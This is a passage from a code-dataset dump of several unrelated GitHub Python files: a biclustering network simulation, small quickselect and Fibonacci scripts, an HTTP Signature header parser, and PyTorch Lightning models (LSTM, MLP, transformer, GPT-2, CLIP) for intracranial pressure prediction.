len(consider_bics) == 0:\n # if nothing to consider, add all empty nodes to starting points \n starting_nodes = [node for node in G.nodes() if (len(G.node[node]['bics']) == 0 and unassigned_order(node, G) > min_n_neigh*m)]\n if verbose:\n print(\"\\twill consider no biclusters; de novo strating nodes identified\",len(starting_nodes))\n return starting_nodes, True\n else:\n if verbose:\n print(\"\\twill consider biclusters\",consider_bics,\"previously added to the Graph\")\n consider_bics = list(consider_bics)\n starting_nodes = []\n for n in G.nodes():\n if len(G.node[n]['bics'])==0:\n bics_ = copy.copy(consider_bics)\n for neigh in G[n].keys():\n assigned_bics = G.node[neigh][\"bics\"]\n for bic in assigned_bics:\n if bic in bics_:\n bics_.remove(bic)\n if len(bics_)==0:\n # if all bics contacted by node n, add to starting points\n starting_nodes.append(n)\n break\n if len(starting_nodes) == 0:\n if verbose:\n print(\"Fails to identify any valid starting node. Try increasing m.\", file = sys.stderr)\n return [], False\n else:\n if verbose:\n print(\"Valid strating nodes identified\",len(starting_nodes)) \n return starting_nodes, False\n\ndef unassigned_order(node, G):\n '''Counts the number of unlabelled neighbours for a node in G'''\n order = 0 \n for node2 in G[node].keys(): \n if len(G.node[node2]['bics']) == 0:\n order +=1\n return order \n\ndef DIAMOnD(n, G, CC, requred_len):\n '''Implements the method from https://journals.plos.org/ploscompbiol/article?id=10.1371/journal.pcbi.1004120'''\n if len(CC)< requred_len:\n p_vals=[]\n s0 = len(CC)\n N = 2000\n best_pval,best_candidate = 1.0,-1\n for n_ in CC:\n for n2 in G[n_].keys():\n if len(G.node[n2]['bics']) == 0 and not n2 in CC:\n n2_neigh = G[n2].keys()\n ks = len([x for x in n2_neigh if x in CC])# how many neighbours in CC\n k_bg = len(n2_neigh) - ks\n p_val = pvalue(ks,k_bg,s0,N).right_tail\n if p_val < best_pval:\n best_pval = p_val\n best_candidate = n2\n CC.append(best_candidate)\n if len(CC)< requred_len:\n CC=DIAMOnD(n, G, CC, requred_len)\n return CC\n\ndef DFS(n, G, CC, requred_len):\n '''Depth-first search'''\n for n2 in G[n].keys():\n if len(G.node[n2]['bics']) == 0 and not n2 in CC:\n if len(CC) < requred_len:\n CC.append(n2)\n CC = DFS(n2, G, CC, requred_len)\n else:\n return CC\n return CC\n\ndef BFS(n, G, CC, requred_len):\n '''Breadth-first search'''\n neighbours = []\n for n2 in G[n].keys():\n if len(G.node[n2]['bics']) == 0 and not n2 in CC:\n if len(CC) < requred_len:\n neighbours.append(n2)\n CC.append(n2)\n else:\n return CC\n for n2 in neighbours:\n if len(CC) < requred_len:\n CC = DFS(n2, G, CC, requred_len)\n else:\n return CC\n return CC\n\ndef assign_nodes(G,genes, bics,method=\"DFS\", verbose = True):\n '''Assigns genes to G network nodes given gene-bicluster membership.\n Takes into account bicsluters which already mapped to the network. '''\n min_n_neigh = len(bics)\n mapped_genes = {}\n already_mapped = []\n if method == \"DFS\":\n func = DFS\n elif method == \"BFS\":\n func = BFS\n elif method == \"DIAMOnD\":\n func = DIAMOnD\n else:\n print(\"Wrong method name\", method,file= sys.stderr)\n return None, {}\n \n # identifies seed nodes - which already assigned to a bicluster or pic a random unlabelled nodes\n starting_nodes, are_new = find_starting_points(G,bics,m=1,verbose = verbose)\n G_ = G.copy() \n genes_ = copy.copy(genes)\n \n requred_len = len(genes_)\n \n random.shuffle(starting_nodes)\n #if not are_new: # \n if verbose:\n print(\"\\tGrow CC\", bics, \"from any of\",len(starting_nodes),\"nodes for\", len(genes_),\"genes.\")\n for starting_node in starting_nodes:\n if are_new: # if new CC initialized, map starting node to a gene\n CC = [starting_node]\n else:\n CC = []\n requred_len = len(genes_)\n CC = func(starting_node, G_, CC, requred_len)\n # map genes\n for n in CC:\n g = genes_.pop()\n mapped_genes[n] = g\n G_.node[n]['bics'] = bics\n if len(genes_) == 0:\n return G_, mapped_genes\n else:\n if verbose:\n print(\"\\t\\tgenes remaining unassigned\",len(genes_))\n print(\"\\tFailed trial\",trial,\"for CC of\",len(CC), \"genes\",len(genes_),file=sys.stderr )\n return None, {}\n \n\ndef grow_independent_subnetworks(G,gene_groups,max_bics_per_gene, method=\"DFS\", verbose=True):\n mapping= {}\n for gene_group in gene_groups:\n bics = gene_group['bics']\n if len(bics) == 1:\n genes = copy.copy(gene_group['genes'])\n if verbose:\n print(\"Assing nodes for\",len(genes),\"gene(s) from\", bics,\"using\", method)\n G, mapped_genes = assign_nodes(G,genes, bics, method=method,verbose = verbose)\n if len(mapped_genes.keys())>0:\n mapping.update(mapped_genes)\n else:\n if verbose:\n print(\"Failed mapping for \",len(genes),\"gene(s) from\", bics, file = sys.stderr)\n return None, {}\n return G, mapping\n \n\ndef add_shared_nodes(G,gene_groups,max_bics_per_gene, mapping, verbose=True):\n # add shared nodes, starting from nodes assigned to many bicslucters\n for s in range(max_bics_per_gene,1,-1):\n for gene_group in gene_groups:\n bics = gene_group['bics']\n genes = copy.copy(gene_group['genes'])\n if len(bics) == s:\n if verbose:\n print(\"Assing nodes for\",len(genes),\"gene(s) from\", bics)\n starting_nodes, are_new = find_starting_points(G,bics,m=1,verbose = verbose)\n n_genes = len(genes)\n if len(starting_nodes) >= n_genes:\n nodes = random.sample(starting_nodes,n_genes)\n for i in range(0,n_genes): # not necessarily directly connected\n # update mapping and G\n mapping[nodes[i]]=genes[i]\n G.node[nodes[i]]['bics'] = bics\n print(\"Success for\",len(genes),\"gene(s) from\", bics)\n else:\n print(\"Failed for \",len(genes),\"gene(s) from\", bics,\".No free candidate nodes connecting subnetworks available.\", file = sys.stderr)\n return False, None\n \n assigned_nodes = [node for node in G.nodes() if len(G.node[node]['bics']) != 0]\n print(\"All genes from biclusters mapped:\", set(assigned_nodes)== set( mapping.keys()))\n # add background genes:\n unassigned_nodes = [node for node in G.nodes() if len(G.node[node]['bics']) == 0]\n \n if verbose:\n print(\"Background nodes\",len(unassigned_nodes))\n for gene_group in gene_groups:\n bics = gene_group['bics']\n genes = gene_group['genes']\n if len(bics) == 0:\n unassigned_genes = genes\n print(\"Unmapped genes:\", len(unassigned_genes))\n mapping.update(dict(zip(unassigned_nodes,unassigned_genes)))\n if verbose:\n print(\"All nodes mapped:\",set(mapping.keys())==set(G.nodes()), file = sys.stderr)\n # relabel nodes\n G = nx.relabel_nodes(G,mapping=mapping)\n \n return True, G\n\ndef mapp_all_nodes(G,gene_groups,max_bics_per_gene, method=\"DFS\", verbose=True):\n G_ = G.copy()\n nx.set_node_attributes(G_,'bics',[])\n nx.set_node_attributes(G_,'gene',[])\n # first create independent networks\n print(\"Grow independent networks \")\n G_, mapping = grow_independent_subnetworks(G_,gene_groups,max_bics_per_gene, method=method, verbose=verbose)\n if len(mapping)>0:\n print(\"\\tAdd shared genes\")\n # then select nodes connecting independent subnetworks and label with shared genes\n passed, G_ = add_shared_nodes(G_,gene_groups,max_bics_per_gene,mapping, verbose=verbose)\n if passed:\n return G_\n else:\n print(\"\\t...failed assigning shared genes\")\n else:\n print(\"\\t...failed growing independent subnetworks\")\n\n\ndef check_connectivity(G, anno,verbose = True, plot = False):\n # checks whether genes from bicluster form a connected component\n all_connected = True\n for bc in range(0,anno.shape[1]):\n nodes_in_bic = []\n for n,data in G.nodes(data=True):\n if bc in data['bics']:\n nodes_in_bic.append(n)\n subnet = G.subgraph(nodes_in_bic)\n if len([x for x in nx.connected_components(subnet)])>1:\n all_connected = False\n print(\"Subnetwork\",bc, \"is not connected.\", file = sys.stderr)\n if plot:\n pos = nx.spring_layout(subnet , iterations=1000)\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n nx.draw(subnet ,pos=pos, with_labels=True, font_weight='bold')\n plt.show()\n if verbose:\n print_network_stats(subnet)\n return all_connected","repo_name":"ozolotareva/DESMOND","sub_path":"DESMOND_py2/simulations.py","file_name":"simulations.py","file_ext":"py","file_size_in_byte":16696,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"29"} +{"seq_id":"6096361007","text":"def checkExeption(arr, k):\n try:\n for i in range(len(arr)):\n a = int(arr[i])\n except ValueError:\n print(\"[-] Error, array contains different types\")\n exit()\n if len(arr) == 0:\n print(\"[-] Error, array is empty\")\n exit()\n if len(arr) == 1:\n return arr[0]\n if len(arr) < k:\n print(\"[-] Error, k is greater than the length of the array\")\n exit()\n\n\ndef sepList(arr, left, right, q):\n p = arr[q]\n arr[q], arr[right] = arr[right], arr[q]\n i = left\n for j in range(left, right):\n if arr[j] <= p:\n arr[i], arr[j] = arr[j], arr[i]\n i += 1\n arr[i], arr[right] = arr[right], arr[i]\n return i\n\n\ndef k_min(arr, k):\n left = 0\n right = len(arr) - 1\n if left == right:\n return arr[left]\n q = sepList(arr, left, right, (left + right) // 2)\n if q == k:\n return arr[q]\n if k < q:\n return k_min(arr[:q], k)\n elif k > q:\n return k_min(arr[q + 1:], k - q - 1)\n\n\nif __name__ == '__main__':\n search_sequence = [10, True, 0, 2, 9]\n print(\"Enter k:\")\n try:\n k = int(input())\n except ValueError:\n print(\"[-] Error, k1 is not an integer or empty\")\n exit()\n\n print(f\"[+] Search sequence: {search_sequence}\")\n print(f\"[+] k: {k}\")\n checkExeption(search_sequence, k)\n print(\"[+] Searching...\")\n print(f\"[+] Result: {k_min(search_sequence, k - 1)}\")","repo_name":"andrey1pf/Python","sub_path":"Task5/Task05/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"6016414378","text":"from functools import cache\n\n\nnum = int(input())\n\n\ndef fibonachi(n):\n if n <= 1:\n return 0\n else:\n x, y = 0, 1\n print(x)\n for i in range(n - 1):\n x, y = y, x + y\n print(x)\n\n\nfibonachi(num)\n# @cache\n# def fibonacci(n):\n# if n in (1, 2):\n# return 1\n# return fibonacci(n - 1) + fibonacci(n - 2)\n#\n#\n# print(fibonacci(500))","repo_name":"Pandemic616/tasks","sub_path":"fibonachi.py","file_name":"fibonachi.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"36946878945","text":"import logging\n\nlogger = logging.getLogger(__name__)\n\n\nclass Signature:\n def __init__(self, key_id, algorithm, headers, signature):\n self.key_id = key_id\n self.algorithm = algorithm\n self.headers = headers\n self.signature = signature\n\n if self.algorithm not in [\"rsa-sha256\", \"hs2019\"]:\n logger.error(f\"Unsupported algorithm {self.algorithm}\")\n logger.error(self.signature)\n logger.error(self.headers)\n logger.error(self.key_id)\n\n raise Exception(f\"Unsupported algorithm {self.algorithm}\")\n\n def fields(self):\n return self.headers.split(\" \")\n\n @staticmethod\n def from_signature_header(header):\n try:\n headers = header.split(\",\")\n headers = [x.split('=\"', 1) for x in headers]\n parsed = {x[0]: x[1].replace('\"', \"\") for x in headers}\n\n return Signature(\n parsed[\"keyId\"],\n parsed.get(\"algorithm\", \"rsa-sha256\"),\n parsed[\"headers\"],\n parsed[\"signature\"],\n )\n except Exception:\n logger.error(f\"failed to parse signature {header}\")\n\n\ndef parse_signature_header(header):\n return Signature.from_signature_header(header)\n","repo_name":"HelgeKrueger/bovine","sub_path":"bovine/bovine/utils/signature_parser.py","file_name":"signature_parser.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"29"} +{"seq_id":"44290299113","text":"import copy\nfrom typing import Optional, Tuple\nimport math\n\nimport numpy as np\nimport pytorch_lightning as pl\nimport sklearn\nimport torch\nfrom torch.nn.utils.rnn import pack_padded_sequence, pad_packed_sequence\n\n\nclass LitSeqModel(pl.LightningModule):\n def __init__(self, feature_names, regression, steps_per_epoch, pos_frac,\n max_epochs=5, weight_decay=0.1, use_macro_loss=True, \n use_pos_weight=True, use_nan_embed=False, lr=0.001, use_huber=False,\n use_static=True, freeze_nan_embed=False, norm_nan_embed=False, \n nan_embed_size=512, use_nan_embed_transformer=False, \n nan_embed_transformer_n_layers=3, \n nan_embed_transformer_n_heads=8, dropout=0.2, low_mem_mode=False):\n super().__init__() \n self.regression = regression\n self.use_macro_loss = use_macro_loss\n self.use_nan_embed = use_nan_embed\n self.lr = lr\n self.use_huber = use_huber\n self.use_static = use_static\n self.freeze_nan_embed = freeze_nan_embed\n self.nan_embed_size = nan_embed_size\n self.norm_nan_embed = norm_nan_embed\n self.dropout = dropout\n \n # get feature names\n feature_names = feature_names\n \n if use_static:\n # save idcs of static idcs to have separate streams in model\n static_names = ['Geschlecht', 'Alter', 'Größe', 'Gewicht']\n static_idcs = [i for i, name in enumerate(feature_names)\n if name in static_names\n or name.startswith(\"Diagnose\")\n or name.startswith(\"DB_\")]\n non_static_idcs = [i for i in range(len(feature_names)) if i not in static_idcs]\n self.register_buffer(\"static_idcs\", torch.tensor(static_idcs))\n self.register_buffer(\"recurrent_idcs\", torch.tensor(non_static_idcs))\n self.num_recurrent_inputs = len(self.recurrent_idcs)\n self.num_static_inputs = len(self.static_idcs)\n else:\n self.num_recurrent_inputs = len(feature_names)\n self.num_static_inputs = 0\n self.static_idcs = None\n self.recurrent_idcs = list(range(len(feature_names)))\n self.num_inputs = len(feature_names)\n \n # define loss \n self.pos_weight = (1 - pos_frac) / pos_frac if use_pos_weight else None\n self.loss_func = SequentialLoss(self.regression, self.use_macro_loss, self.pos_weight, self.use_huber)\n \n if self.use_nan_embed:\n from icp_pred.nan_emb import NanEmbed, NanEmbedTransformer\n emb_size = self.nan_embed_size\n if use_nan_embed_transformer:\n self.embed = NanEmbedTransformer(self.num_inputs, emb_size, low_mem_mode,\n n_layers=nan_embed_transformer_n_layers, n_heads=nan_embed_transformer_n_heads, dropout=self.dropout)\n else:\n self.embed = NanEmbed(self.num_inputs, emb_size, low_mem_mode)\n\n if self.freeze_nan_embed:\n for p in self.embed.parameters():\n p.requires_grad = False\n\n if self.norm_nan_embed:\n self.embed = torch.nn.Sequential(self.embed, torch.nn.LayerNorm(emb_size))\n \n self.num_recurrent_inputs = emb_size\n self.num_static_inputs = 0\n self.static_idcs = None\n self.recurrent_idcs = torch.tensor(list(range(emb_size)))\n \n \n self._average_model = None\n \n self.max_epochs = max_epochs\n self.steps_per_epoch = steps_per_epoch\n self.weight_decay = weight_decay\n \n def forward(self, x, *args, **kwargs):\n if self.use_nan_embed:\n x = self.embed(x)\n #x_emb = self.embed(x.reshape(-1, x.shape[-1]))#[:, 0])\n #x = x_emb.reshape(*x.shape[:-1], x_emb.shape[-1])\n preds = self.make_preds(x, *args, **kwargs)\n\n return preds\n \n def predict(self, x, *args, **kwargs):\n preds = self.forward(x, *args, **kwargs)\n if not self.regression:\n preds = torch.sigmoid(preds)\n return preds\n # custom methods\n\n # PT-lightning methods\n def training_step(self, batch, batch_idx):\n hiddens = None\n inputs, targets, lens = batch\n loss, preds = self.calc_loss(inputs, targets, hiddens, lens=lens)\n self.log(\"train_loss\", loss, on_step=True, on_epoch=False, prog_bar=False, logger=True)\n lr = self.scheduler.get_last_lr()[0]\n self.log('lr', lr, on_epoch=False, on_step=True, prog_bar=False, logger=True)\n return loss\n #return {\"loss\": loss}#, \"hiddens\": self.hiddens}\n \n def validation_step(self, batch, batch_idx):\n inputs, targets, lens = batch\n loss, preds = self.calc_loss(inputs, targets, lens=lens)\n self.log(\"val_loss\", loss, on_step=False, on_epoch=True, prog_bar=True, logger=True)\n return copy.deepcopy(preds.detach().cpu()), copy.deepcopy(targets.detach().cpu())\n \n def validation_epoch_end(self, val_step_output_list):\n # calculate f1_score, accuracy etc\n preds = torch.cat([step_out[0].flatten() for step_out in val_step_output_list]).cpu().squeeze().float().numpy()\n targets = torch.cat([step_out[1].flatten() for step_out in val_step_output_list]).cpu().squeeze().float().numpy()\n # remove NaNs\n mask = ~np.isnan(targets)\n preds = preds[mask]\n targets = targets[mask]\n \n if self.regression:\n try:\n r2 = sklearn.metrics.r2_score(targets, preds)\n mse = sklearn.metrics.mean_squared_error(targets, preds)\n rmse = np.sqrt(mse)\n mae = sklearn.metrics.mean_absolute_error(targets, preds)\n except ValueError:\n print(\"ValueError: NaNs or Infs in targets or predictions\")\n print(targets.shape, preds.shape)\n print(\"Inf target preds:\", np.isinf(targets).sum(), np.isinf(preds).sum())\n print(\"Nan target preds: \", np.isnan(targets).sum(), np.isnan(preds).sum())\n print(targets, preds)\n # to stop training, raise a KeyboardInterrupt\n raise KeyboardInterrupt\n self.log(\"val_r2\", r2, on_epoch=True, prog_bar=True)\n self.log(\"val_mse\", mse, on_epoch=True, prog_bar=True)\n self.log(\"val_rmse\", rmse, on_epoch=True, prog_bar=True)\n self.log(\"val_mae\", mae, on_epoch=True, prog_bar=True)\n \n else:\n #print(targets.min(), targets.max())\n \n targets = targets.astype(int)\n #print(preds.min(), preds.max())\n #print(targets.min(), targets.max())\n # average precision\n ap = sklearn.metrics.average_precision_score(targets, preds, average=\"macro\", pos_label=1)\n self.log('val_ap', ap, on_epoch=True, prog_bar=False)\n # auc - per class and macro-averaged\n #print(\"Shapes: \", targets.shape, preds.shape)\n auc_micro = sklearn.metrics.roc_auc_score(targets, preds, average=\"micro\")\n #auc_macro = sklearn.metrics.roc_auc_score(targets, preds, average=\"macro\")\n #self.log('val_auc_macro', auc_macro, on_epoch=True, prog_bar=True)\n self.log('val_auc_micro', auc_micro, on_epoch=True, prog_bar=True)\n\n # metrics based on binary predictions\n binary_preds = (preds > 0.5).astype(int)\n self.log(\"val_acc_micro\", sklearn.metrics.accuracy_score(targets.reshape(-1), binary_preds.reshape(-1)), on_epoch=True)\n #macro_acc = (targets == binary_preds).astype(float).mean(axis=0).mean()\n #self.log(\"val_acc_macro\", macro_acc, on_epoch=True)\n #self.log(\"val_f1_macro\", sklearn.metrics.f1_score(targets, binary_preds, average=\"macro\"), on_epoch=True, logger=True)\n self.log(\"val_f1_micro\", sklearn.metrics.f1_score(targets, binary_preds, average=\"micro\"), on_epoch=True, logger=True)\n\n # log diagnostics of output distribution\n preds_for_pos = preds[targets == 1]\n preds_for_neg = preds[targets == 0]\n pos_mean = preds_for_pos.mean()\n neg_mean = preds_for_neg.mean()\n self.log(\"debug/pos_preds_mean\", pos_mean, on_epoch=True)\n self.log(\"debug/pos_preds_std\", preds_for_pos.std(), on_epoch=True)\n self.log(\"debug/neg_preds_mean\", neg_mean, on_epoch=True)\n self.log(\"debug/neg_preds_std\", preds_for_neg.std(), on_epoch=True)\n self.log(\"debug/preds_mean\", preds.mean(), on_epoch=True)\n self.log(\"debug/preds_std\", preds.std(), on_epoch=True)\n self.log(\"debug/preds_mean_diff\", pos_mean - neg_mean, on_epoch=True)\n \n\n def configure_optimizers_old(self):\n optimizer = torch.optim.AdamW(self.parameters(), lr=self.lr, weight_decay=0.1)\n #scheduler = torch.optim.lr_scheduler.StepLR(optimizer, 1, gamma=0.98)\n return [optimizer]#, [scheduler]\n \n def configure_optimizers(self):\n optimizer = torch.optim.AdamW(self.parameters(),\n lr=self.lr,#5e-5,\n betas=(0.9, 0.98),\n eps=1e-6,\n weight_decay=self.weight_decay)\n \n self.scheduler = torch.optim.lr_scheduler.OneCycleLR(optimizer, self.lr, steps_per_epoch=self.steps_per_epoch, epochs=self.max_epochs, pct_start=0.05)\n scheduler = {\"scheduler\": self.scheduler, \n \"interval\": \"step\" } # necessary to make PL call the scheduler.step after every batch\n return [optimizer], [scheduler]\n \n\n def calc_loss(self, inputs, targets, hiddens=None, lens=None):\n # pred\n if hiddens is None:\n preds = self(inputs, lens=lens)\n else:\n preds = self(inputs, hiddens=hiddens, lens=lens)\n # calc loss\n loss = self.loss_func(preds, targets)\n return loss, preds\n \n \n ### The two following functions fix the 'UserWarning: Detected call of `lr_scheduler.step()` before `optimizer.step()`'\n # will be patched in later versions of PyTorch-lightning\n def optimizer_step(self, epoch, batch_idx, optimizer, optimizer_idx, optimizer_closure, **kwargs):\n self.should_skip_lr_scheduler_step = False\n scaler = getattr(self.trainer.strategy.precision_plugin, \"scaler\", None)\n if scaler:\n scale_before_step = scaler.get_scale()\n optimizer.step(closure=optimizer_closure)\n if scaler:\n scale_after_step = scaler.get_scale()\n self.should_skip_lr_scheduler_step = scale_before_step > scale_after_step\n\n def lr_scheduler_step(self, scheduler, optimizer_idx, metric):\n if self.should_skip_lr_scheduler_step:\n return\n scheduler.step()\n\n \nclass LitCLIP(LitSeqModel):\n def __init__(self, *args, \n clip_name=\"ViT-B/16\",\n **kwargs):\n super().__init__(*args, **kwargs)\n \n self.clip_name = clip_name\n \n import clip\n clip_model, transform = clip.load(clip_name, device=\"cpu\", jit=False)\n \n # get relevant clip layers\n self.transformer = clip_model.transformer\n self.token_embedding = clip_model.token_embedding\n self.positional_embedding = clip_model.positional_embedding\n self.ln_final = clip_model.ln_final\n # freeze attention layers\n for n, p in self.transformer.named_parameters():\n p.requires_grad = \"mlp\" in n or \"ln\" in n\n \n # define own mapping layers\n self.input_mapping = torch.nn.Linear(self.num_recurrent_inputs + self.num_static_inputs, self.token_embedding.weight.shape[1])\n self.out_mapping = torch.nn.Linear(self.transformer.width, 1)\n \n def make_preds(self, x, lens=None):\n # x = [BS, seq_len, feats]\n \n #x = self.token_embedding(text)#.type(self.dtype) # [batch_size, n_ctx, d_model]\n x = self.input_mapping(x)\n \n x = x + self.positional_embedding#.type(self.dtype)\n x = x.permute(1, 0, 2) # NLD -> LND\n x = self.transformer(x)\n x = x.permute(1, 0, 2) # LND -> NLD\n x = self.ln_final(x) #.type(self.dtype)\n\n # x.shape = [batch_size, n_ctx, transformer.width]\n # take features from the eot embedding (eot_token is the highest number in each sequence) if we only want a single embedding for the sentence\n #x = x[torch.arange(x.shape[0]), text.argmax(dim=-1)] @ self.text_projection\n #x = x[torch.arange(x.shape[0]), lens] @ self.text_projection\n \n # make prediction for each time-step\n x = self.out_mapping(x)\n return x\n \n \ndef load_gpt_model(name, use_adapter=False, reduction_factor=2):\n device = torch.device(\"cpu\")\n if name == \"neo1.3\":\n from transformers import GPTNeoForCausalLM, GPT2Tokenizer\n gpt_tokenizer = GPT2Tokenizer.from_pretrained(\"EleutherAI/gpt-neo-1.3B\")\n gpt_model = GPTNeoForCausalLM.from_pretrained(\"EleutherAI/gpt-neo-1.3B\", pad_token_id=gpt_tokenizer.eos_token_id)\n elif name == \"neo2.7\":\n from transformers import GPTNeoForCausalLM, GPT2Tokenizer\n gpt_tokenizer = GPT2Tokenizer.from_pretrained(\"EleutherAI/gpt-neo-2.7B\")\n gpt_model = GPTNeoForCausalLM.from_pretrained(\"EleutherAI/gpt-neo-2.7B\", pad_token_id=gpt_tokenizer.eos_token_id)\n elif \"gpt2\" in name:\n from transformers import GPT2LMHeadModel, GPT2Tokenizer\n gpt_tokenizer = GPT2Tokenizer.from_pretrained(name)\n if use_adapter:\n from transformers import GPT2AdapterModel\n gpt_model = GPT2AdapterModel.from_pretrained(name, pad_token_id=gpt_tokenizer.eos_token_id)\n # task adapter - only add if not existing\n \n \n import transformers\n config = transformers.PfeifferConfig({\n \"reduction_factor\": reduction_factor,\n },\n reduction_factor=reduction_factor)\n\n gpt_model.add_adapter(\"icp\", config=config, overwrite_ok=False, set_active=True) \n \n # Enable adapter training\n gpt_model.train_adapter(\"icp\")\n #gpt_model.set_active_adapters(\"icp\")\n else:\n gpt_model = GPT2LMHeadModel.from_pretrained(name, pad_token_id=gpt_tokenizer.eos_token_id) \n \n gpt_model = gpt_model.to(device)\n return gpt_model, gpt_tokenizer\n\n\ndef apply_train_mode_gpt(mode, model):\n # freeze certain layers\n if mode == \"freeze\":\n for p in model.parameters():\n p.requires_grad = False\n elif mode == \"train_norm\":\n for n, p in model.named_parameters():\n p.requires_grad = \"ln_\" in n\n elif mode == \"full\":\n for p in model.parameters():\n p.requires_grad = True\n elif mode == \"train_mlp_norm\":\n for n, p in model.named_parameters():\n p.requires_grad = \"ln_\" in n or \"mlp\" in n\n elif mode == \"adapters\":\n #return # the adapters library handles this\n for n, p in model.named_parameters():\n p.requires_grad = \"adapter\" in n or \"ln_\" in n\n\n \nclass LitGPT(LitSeqModel):\n def __init__(self, *args, \n gpt_name=\"gpt2\",\n mode=\"train_mlp_norm\",\n pretrained=True,\n reduction_factor=2,\n **kwargs):\n super().__init__(*args, **kwargs)\n self.use_adapter = \"adapter\" in mode\n self.gpt_name = gpt_name\n # load model\n self.model, self.tokenizer = load_gpt_model(gpt_name, use_adapter=self.use_adapter, reduction_factor=reduction_factor)\n # re-init weights if not using pretrained\n if not pretrained:\n self.model.init_weights() #.apply(self.model._init_weights) \n\n # freeze some params\n apply_train_mode_gpt(mode, self.model)\n # get width\n self.width = self.model.transformer.wte.weight.shape[1]\n # create input and output layers\n self.input_mapping = torch.nn.Linear(self.num_recurrent_inputs + self.num_static_inputs, self.width)\n self.out_mapping = torch.nn.Linear(self.width, 1, bias=False)\n self.out_norm = torch.nn.LayerNorm(self.width)\n # replace output layer by our newly initialized one\n #self.model.transformer.wte = self.input_mapping\n #self.model.lm_head = self.out_mapping\n #self.model.add_classification_head(\"icp\", num_labels=1, activation_function=\"linear\")\n \n \n def make_preds(self, x, lens=None):\n # x = [BS, seq_len, feats]\n #print(x.shape)\n x = self.input_mapping(x)\n x = self.model(inputs_embeds=x) \n x = x[\"last_hidden_state\"]\n x = self.out_norm(x)\n x = self.out_mapping(x)\n #print(x.shape)\n #x = self.model(x)[\"logits\"]\n return x\n\n \nclass LitTransformer(LitSeqModel):\n def __init__(self, *args,\n num_transformer_blocks=3,\n hidden_size=512, \n n_heads=8,\n **kwargs):\n super().__init__(*args, **kwargs)\n \n self.out_size = 1\n self.hidden_size = hidden_size\n \n from torch.nn import TransformerEncoder, TransformerEncoderLayer\n \n self.pos_encoder = PositionalEncoding(hidden_size, self.dropout)\n encoder_layers = TransformerEncoderLayer(hidden_size, n_heads, \n hidden_size * 4, self.dropout, \n batch_first=True,\n norm_first=False)\n self.transformer_encoder = TransformerEncoder(encoder_layers, num_transformer_blocks)\n self.encoder = torch.nn.Linear(self.num_recurrent_inputs, hidden_size)\n self.decoder = torch.nn.Linear(hidden_size, 1)\n \n \n def make_preds(self, x, lens=None):\n # 1. map to tokens\n x = self.encoder(x) * math.sqrt(self.hidden_size)\n # 2. add positional encoding\n x = self.pos_encoder(x)\n # 3. apply transformer\n src_mask = generate_square_subsequent_mask(x.shape[1]).to(x.device).to(x.dtype)\n x = self.transformer_encoder(x, src_mask)\n # 4. map to output\n x = self.decoder(x)\n return x\n\n \ndef generate_square_subsequent_mask(sz: int) -> torch.Tensor:\n \"\"\"\n Generates an upper-triangular matrix of -inf, with zeros on diag.\n Is used in the causal transformer modelling such that tokens can only attend to past tokens. \n \"\"\"\n return torch.triu(torch.ones(sz, sz) * float('-inf'), diagonal=1)\n\n\nclass PositionalEncoding(torch.nn.Module):\n\n def __init__(self, d_model: int, dropout: float = 0.1, max_len: int = 5000):\n super().__init__()\n self.dropout = torch.nn.Dropout(p=dropout)\n\n position = torch.arange(max_len).unsqueeze(1)\n div_term = torch.exp(torch.arange(0, d_model, 2) * (-math.log(10000.0) / d_model))\n pe = torch.zeros(max_len, 1, d_model)\n pe[:, 0, 0::2] = torch.sin(position * div_term)\n pe[:, 0, 1::2] = torch.cos(position * div_term)\n self.register_buffer('pe', pe)\n\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n \"\"\"\n Args:\n x: Tensor, shape [seq_len, batch_size, embedding_dim]\n \"\"\"\n x = x + self.pe[:x.size(0)]\n return self.dropout(x)\n\n \nclass LitMLP(LitSeqModel):\n def __init__(self, \n *args, \n hidden_size=256, \n **kwargs):\n super().__init__(*args, **kwargs)\n self.save_hyperparameters() \n \n self.hidden_size = hidden_size\n self.out_size = 1\n \n # define model\n # static part\n if self.static_idcs is not None:\n self.encode_static = torch.nn.Sequential(\n torch.nn.Linear(self.num_static_inputs, self.hidden_size),\n torch.nn.ReLU(True),\n torch.nn.Linear(self.hidden_size, self.hidden_size),\n #torch.nn.LayerNorm(normalized_shape=[self.hidden_size]),\n torch.nn.ReLU(True),\n )\n # recurrent part\n self.encode_recurrent = torch.nn.Sequential(\n torch.nn.Linear(self.num_recurrent_inputs, self.hidden_size),\n torch.nn.ReLU(True),\n torch.nn.Linear(self.hidden_size, self.hidden_size),\n #torch.nn.LayerNorm(normalized_shape=[self.hidden_size]),\n torch.nn.ReLU(True),\n )\n # out part\n self.out_mlp = torch.nn.Sequential(\n torch.nn.Linear(self.hidden_size, self.hidden_size), \n torch.nn.ReLU(True),\n torch.nn.Linear(self.hidden_size, self.out_size))\n \n def make_preds(self, x, lens=None, hiddens=None):\n # encode\n x = self.encode_recurrent(x)\n x = self.out_mlp(x)\n return x\n \n def make_preds_old(self, \n x: torch.Tensor, \n lens: Optional[torch.Tensor] = None, \n hiddens: Optional[Tuple[torch.Tensor, torch.Tensor]] = None):\n # encode recurrence using mlp\n recurrent_stream = x[..., self.recurrent_idcs]\n recurrent_stream = self.encode_recurrent(recurrent_stream)\n \n # encode static inputs\n if self.static_idcs is not None:\n static_stream = x[..., self.static_idcs]\n static_stream = self.encode_static(static_stream)\n else:\n static_stream = 0\n \n # apply mlp to transform \n x = self.out_mlp(static_stream + recurrent_stream)\n return x\n\n\nclass LitRNN(LitSeqModel):\n def __init__(self, *args, hidden_size=256, rnn_layers=1, rnn_type=\"lstm\", use_lens=False,\n use_in_mapping=False, use_out_mapping=False,\n **kwargs):\n super().__init__(*args, **kwargs)\n self.save_hyperparameters()\n \n self.hidden_size = hidden_size\n self.out_size = 1\n self.use_lens = use_lens\n self.use_in_mapping = use_in_mapping\n self.use_out_mapping = use_out_mapping\n \n # define model\n # recurrent part\n rnn_args = [self.hidden_size if use_in_mapping else self.num_recurrent_inputs,\n self.hidden_size if use_out_mapping else self.out_size,\n ]\n rnn_kwargs 